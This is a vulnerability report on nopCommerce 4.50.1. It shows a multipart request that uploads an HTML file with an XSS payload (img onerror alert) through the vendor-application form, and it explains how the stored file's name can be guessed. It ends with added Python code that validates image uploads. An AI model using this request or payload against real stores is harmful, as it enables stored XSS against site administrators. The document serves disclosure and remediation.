Unrestricted File Upload in Apply for vendor account feature #6192

Closed
@trungtin1998

Description

nopCommerce version: 4.50.1

Steps to reproduce the problem:

  • In the Apply for vendor account feature, a customer could upload an arbitrary file, for example the file script.html; the content of the submitted form is as below:
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Name"

pentester
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Email"

phamtrungtintf1512@gmail.com
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Description"

Unrestricted File Upload in Apply for vendor account feature
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="uploadedFile"; filename="script.html"
Content-Type: text/html

<h1>Testing upload file by TF1T<img src=x onerror=alert(document.domain)></h1>
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="apply-vendor"


-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="__RequestVerificationToken"

CfDJ8PCrMQQMCTdOtvWnrq2WpITJLfTjickNjSm_qcSluUiK-_7c-VbzzTCok-M1duwMopvVKCMTy1GmrmTtQnch6SHfSXemzptzz2nOOP8uW4X6qGD2Z-1lPLct2WQrWDBY1qV5aGgzwe2T_2BneJo-5FzzMeW1b0o9epdkZ_hZpu-4UqN6zwTaxYTx-gFvJBoFaw
-----------------------------353170076619137176562598160618--
  • After the admin views the vendor application info by clicking the Edit button, the uploaded file is generated, and the final uploaded file has the format /images/thumbs/{id-Vendor.Name-100.Content-Type-extension}
    [screenshot: vendor_list]
    • The id parameter is a 7-digit number and it auto-increments; therefore it is easy to guess/brute-force
    • The user input Vendor.Name is filtered for special characters; therefore I only put alphabetic characters here to keep the output unchanged
    • Content-Type is text/html => Content-Type-extension is html.
  • One of my final uploaded files is https://IP/images/thumbs/0000108_pentester_100.html
    Impact: Unrestricted File Upload in Apply for vendor account feature leading to Stored XSS
    [screenshot: Unrestricted_file_upload-vendor_apply_XSS]
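
The report above shows two weaknesses in how the vendor picture is stored: the extension is derived from the client's Content-Type header, and the file name is built from a sequential id plus user text. The following is an added example of server-side checks that close both gaps; it is not nopCommerce code, and the allowlist, size cap and the constructed sample payloads are assumptions for illustration.

```python
"""Server-side checks for a vendor-application picture upload (added example).

Not nopCommerce code. It addresses the flaw in the report: the stored
extension must come from a server allowlist, not the client's Content-Type,
and the bytes must really be an image of the type claimed.
"""
from __future__ import annotations
import secrets
from typing import Optional

# Allowed image types: the server picks the extension and checks magic bytes.
ALLOWED = {
    "image/png": (".png", [b"\x89PNG\r\n\x1a\n"]),
    "image/jpeg": (".jpg", [b"\xff\xd8\xff"]),
    "image/gif": (".gif", [b"GIF87a", b"GIF89a"]),
}
MAX_BYTES = 2 * 1024 * 1024  # 2 MiB cap (assumed policy, not nopCommerce's)


def sniff(data: bytes) -> Optional[str]:
    """Return the image MIME type implied by the leading bytes, or None."""
    for mime, (_, magics) in ALLOWED.items():
        if any(data.startswith(m) for m in magics):
            return mime
    return None


def validate_upload(declared_type: str, data: bytes) -> tuple:
    """Accept only allowlisted image types whose content matches the claim.

    Returns (ok, reason_or_extension). The extension comes from ALLOWED,
    never from the client's Content-Type header or the uploaded filename.
    """
    if len(data) == 0 or len(data) > MAX_BYTES:
        return False, "size"
    if declared_type not in ALLOWED:
        return False, "content-type not allowed"       # rejects text/html
    if sniff(data) != declared_type:
        return False, "content does not match declared type"
    return True, ALLOWED[declared_type][0]


def storage_name(ext: str) -> str:
    """Unguessable file name: no sequential id and no user-supplied text."""
    return secrets.token_urlsafe(16) + ext


# Constructed inputs modelled on the report, not captured from a live site.
HTML_PAYLOAD = b"<h1>Test<img src=x onerror=alert(document.domain)></h1>"
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    print(validate_upload("text/html", HTML_PAYLOAD))   # (False, ...)
    print(validate_upload("image/png", HTML_PAYLOAD))   # (False, ...)
    print(validate_upload("image/png", PNG_HEADER))     # (True, '.png')
```

Serving stored uploads with a fixed image Content-Type, and ideally from a separate origin, limits what a bypass of these checks could achieve.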
